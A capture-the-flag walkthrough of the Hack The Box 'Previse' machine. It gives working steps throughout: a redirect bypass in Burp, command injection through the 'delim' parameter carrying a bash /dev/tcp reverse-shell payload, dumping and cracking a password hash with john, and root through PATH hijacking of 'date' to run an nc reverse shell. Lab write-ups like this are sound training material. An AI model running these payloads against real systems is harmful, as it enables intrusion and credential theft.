Hello Friends , Today i tried pwning HTB Previse machine. It is tagged as easy.
Learned new things on burpsuite and Linux privilege escalation.
Without furtherado lets jump into action.
First of all do portscan on the target.
sudo nmap -sC -sV ipaddress
There is only port 80 and port 20 open , so nothing special. I opened the webpage at port 80 in my web browser and looked for potential clues i can find.
Website leads to a login page http://ipaddress/login.php. I tried sql injection but no success.
Meanwhile i run gobuster in the background to find hidden files and directories in the server.
gobuster dir -u http://ipaddress -w your_favorite_wordlist
Unfortunately i couldn’t find anything , i run it for 10 minutes and i became quite impatient.
Now its time for some Manual work. I tried accessing http://ipaddress/index.php but it redirected to login page.
Hmm, anyway i wonder how it looks in burpsuite.
Accessed the same page again with burpproxy ON , Wow got interesting response.
If we look closer , we can see the response status code is 302 , also the response body contains Previse Home title.
What is HTTP 302 ?
HTTP 302 Found , redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the Location header.
So its a temporary redirect. I looked for any auth cookies in the web application but there was none.
SQL Injection failed , There are no cookies. We are left with this Redirect.
After some research , i found that we can actually bypass this Temporary Redirect. To do that , you need to tick Intercept responses under Proxy->Options tab.
Now make request again and we can modify the response code.
I have modified HTTP/1.1 302 Found to HTTP/1.1 200 OK.
Alas , we are in. All pages redirect to login page if not logged in. So we will have to modify requests many times.
After playing around, found http://ipaddress/accounts.php as the only useful page. I created a new account and logged in using the credentials i made.
We don’t need to intercept response codes anymore
I haven’t made screenshot for next part , but its simple. After logging in , goto http://ipaddress/files.php and download the siteBackup.zip file.
It have the source code of this web application , i looked through the source code , most crucial files are :-
config.php contains
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = ''; // check the password yourself :)
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>In login.php on line 39 if (crypt($password, '$1$🧂llol$') == $passHash) , Its md5crypt-long hashing.
In logs.php on line 19 $output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");. This line is vulnerable for Remote Code Execution (RCE). We can execute other programs if we add ; in delim parameter.
file_logs.php handles the logs.php , we submit delim parameter in this page.
Start netcat listener on port 9999 , nc -lvnp 9999
Turn ON burpproxy and goto http://ipaddress/file_logs.php , interceptthe request and modify delim parameter.
I set it to space%3b%2fbin%2fbash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f10.10.14.2%2f9999%200%3e%261' , this is in URL encoding.
Plain text :-
> space;/bin/bash -c ‘bash -i > /dev/tcp/10.10.14.2/9999 0>&1’
10.10.14.2 change this to your address.
Booyah , got the shell.
I tried to open user.txt file under /home/m4lwhere/ , but it gave permission denied error.
So we have to access this server through SSH.
Remember the config.php file , it have the credentials for MySQL.
Login mysql as root , mysql -u root -p.
USE previse;
SHOW TABLES;
SELECT * FROM accounts;
We got the hash for m4lwhere’s password. In my terminal for some reason , hash isn’t rendered correctly. Correct format is $1$🧂llol$DQpmdv........
Save the hash to hash.txt file and use john to crack it.
john --format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Now we got the username and password , time for SSH.
ssh m4lwhere@ipaddress , enter the password and boom we are in.
After grabing the user flag , i looked for privilege escalation possibilities.
m4lwhere can run /opt/scripts/access_backup.sh as root.
Contents of access_backup.sh file.
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gzHere $(date is vulnerable for PATH Injection. If we make our own date program and set it in PATH , this script will run our date program instead of original one. Thus gaining root access.
We are going to make a reverse shell with root access.
Start a new netcat listener on port 6666.
cd /dev/shm
echo "nc ipaddress 6666 -e /bin/bash" > date
chmod 777 date
export PATH=/dev/shm:$PATH
sudo /opt/scripts/access_backup.sh
Nice , we got root access.
Spawn new shell with pty and cat out /root/root.txt.
GG We pwned Previse BOX
Thats all for today , See you next time :).